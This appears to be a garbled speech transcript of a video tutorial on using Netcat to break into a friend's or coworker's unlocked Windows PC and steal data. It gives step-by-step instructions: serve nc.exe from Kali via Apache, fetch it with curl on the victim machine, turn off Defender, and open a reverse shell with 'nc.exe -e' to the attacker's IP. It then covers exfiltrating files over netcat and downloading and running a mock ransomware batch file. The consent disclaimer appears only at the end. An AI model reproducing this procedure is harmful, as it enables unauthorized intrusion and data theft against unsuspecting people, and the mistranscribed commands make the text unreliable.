Hi, let's okay. So today we'll be using a tool called as Netcat, which is basically to create a remote connection with any of your victim species. I know it sounds odd, like what is that, man? Why do you need that? See, let's take a scenario. You being a victim, or okay, you being a hacker, you want to see someone's species data. I mean, you want to steal someone's data. Don't do that. So you must take someone's data. And you are in a company, or let's take your friend is very good at something, and you need to know what is the secret of that. You need to know the data, or whatever he has it, and you just steal that. You can steal it using a USB also, but no. The scenario would be like he would go for snack, tea break, but unfortunately he just opened his PC, like he just kept his PC open for unlocked basically. And then you see that opportunity, take the opportunity and just go to your PC. And later on, whatever happens is up to you. And I'll teach you how to do that. I mean, how does that happen actually? Now, once you go into the PC, you run some script, and then there's a connection happening between you, I mean, from your Kali Linux machine and to his Windows PC or any other Windows basically. So you have a connection now. You are both are on the same network, and you can actually talk to each other. Talk means not the real talk. I'm telling the computer talk. You can transfer files from here to here. You can put some scripts in here and then run the script and then like this. So what we're going to do now is that uh, we will be actually sending this file from from the victim. Like right now, what we'll see is we'll just send the file from victim's point of victim's PC to our Kali machine, like extracting the data. No need to run the script as of now. We'll see that later. Now, what we'll do is let's open our terminal. Our terminal is already open, so no worries. Then now let's locate a file called as mc.exe. Oh, it's there already here. Now let's move this file like cp. Oh, it's sudo because it's at somewhere which needs a sudo permission. Sudo this file to /var /review/html and what? Oh, I didn't mention to copy it. I can put a meme for this. Boom, done. If you go to ls/var/html and you see that we have nc.exe done, I mean, waiting for us. Now let's start an Apache server. So sudo systemctl status Apache server, no, all status, dude. I need to start it. The easiest way, man. And now start, done. Now you have an Apache server running in your PC. Let's open our browser and check it out. By the way, my IP, I didn't check my IP, sorry. My IP would be, where is Kali? Here. Of config, and there you go. My IP would be 192.168.0.111. Good, nice. Now let's go to my machine over here and then type 192.168.0.111. Done. Apache 2 Debian server running. Good. So the server is successfully running. Now what we have to do is that we'll go here. Not here actually. Let's go to the folder over here. Now let's take this is the Windows machine. So basically my server is running. Now what I have to do is send that nc.exe from a hacker to the victim's PC. Like I'm the hacker and there's someone who's standing over there and he's attacked. I mean he's a victim. So I'm sending my file to from here to there. Okay, that's how it works. Here I've created a folder having few data because I can't show my folder obviously. So opening this command prompt in this particular folder and then I'll just full screen it. Okay. So let's use a tool called as curl to download the file. And browsers have few restrictions to download exe files and stuff, like until it's legit and has about proper certifications and stuff. That slash nc.exe and the output file would be nc.exe itself. Done. Kaboom. You are now have actually downloaded the file. See here you have the file. Oh, by the way, the command was simple. Curl my URL like with nc.exe and the output file would be nc.exe itself. You can put any other file name, it doesn't matter over there. So if you see my folder, like in this way, you have a file over here. Now, how do you exploit using that file? I'll tell you. So go here and type something which I'm going to type with you. MC NLVP 1234. That's the default port domain. That's one port which we usually use it. And then enter. What is NLVP? New listener verbose port, or let's remove the N. You can directly put listener verbose port also. If I'm wrong, correct me. Don't worry. And now here, as we have an executable file, let's execute it and run the command. So nc.exe -e, which is basically executed. Open this, like it'll open a command prompt. In the command prompt, type this number 192.168.0.111, and then at the port 1234, enter. Go ahead. Wait, huh? Oh, my Defender security is on. Oh, it's good to see my Defender security on. By the way, to do this, you have to security should be turned off no matter what. I was like, why this is on? Ah, to do it off again. Ah, we have turned it off. Come, thank you. Bye. Let's create a connection with my PC to this particular PC. I mean, ignore the part where I did that. Let's have a connection now. Like I had a small issue. That's fine. Kaboom. Now, if you see here my Kali machine, I have an access of this PC. I mean, I'm into this PC now. I can do whatever I want. To give an example, let's do dir and see. I have all the files I needed, like a MP3 file and an image, exe obviously, and then another image. Now let's run some commands, basic commands like sunset2.jpg and kaboom. Oh, see. Oh, okay, boom, somewhere. Oh, that's an image. Oh my God, I got it. I got an image now. Now what? Now what? You have to open some other file, or let's take like i3. What is that? No, it's here over there. I'm wasting my time just like select it. No, I can't. Select face selection and now see I have the sun. I'm sorry, the my wallpaper. And oh, we have an MP3. Can I execute that? Obviously you can. And see, there you go. It's working. Sounds good, no? Fine. Time's up. You have to like transfer that file. I love this file. I want this music. I can drag and drop, but he's somewhere else. So have to do this now. Like let's transfer the file dancing.mp3 to my Kali Linux machine and listen to the same audio again. So what you will do is like nc.exe and then my IP 192.168.0.111 and then my port 1234 and inside this do mention that the arrow mark, I mean the greater than symbol, whatever it is, it acts like an arrow mark. The bigger side, basically you're inserting a file under this IP. So that's what I meant. So under this port and IP, I'm actually inserting a file named dancing.mp3. And here in the Linux machine or in the Kali machine, I'll be listening to that, like whichever is coming for me. VP 1234, and my output file will be dancing.mp3. I'm listening over here and I am transferring the file from Windows to my Kali machine. And boom, you actually have it. Dancing.mp3. Oh my God. Let's open the file and listen to the same audio again. I mean, you should see now whether it's working or not. So obviously, let's see. I don't know. We have a tool. Nice. Fine. Hey, stop, man. No, we'll say and moreover, I have a file called as windows.pat. I'll actually transfer this file to my Apache server now. How do you do that? Sudo cp windows.bat to slash var slash www slash html slash enter. Password followed by double is something good. Done. And now let's go to our victim's PC and download this file same way. Let's take curl http slash slash 292.168 your IP basically because that's your your colleague's IP because Kali is running a server in under its own IP. So yeah, one dot bat. Let it be easy, to execute the file. What I'm gonna do now is that I'll be executing this bat file. Done. Now if I see dir, I'll see a bat file. Oh, there you go. Now see how now this is how an attacker actually executes a script. Oh my god, what is this? Have been infected with ransom. Do you want to pay for this ransom? Okay, it's gonna be easy. Yeah, it's a bank obviously. And then yeah. This ad, bro. Bro, for real. I was thinking to play a song of Rick and Roll. That's fine. So this is how you actually gain access of your no from your victim's PC to your to your Kali machine. It's quite simple. It's quite easy. It's quite basic. But once you master in it, you will understand the purpose of this. And please make sure don't use in the real life. I'm telling you for sure, your network's traffic is already been monitored by the host or the network provider. So whatever you do it for legit purpose. Have the proper consent from the person whomever you are now trying to do this exploit. So that's it. See you in the next video.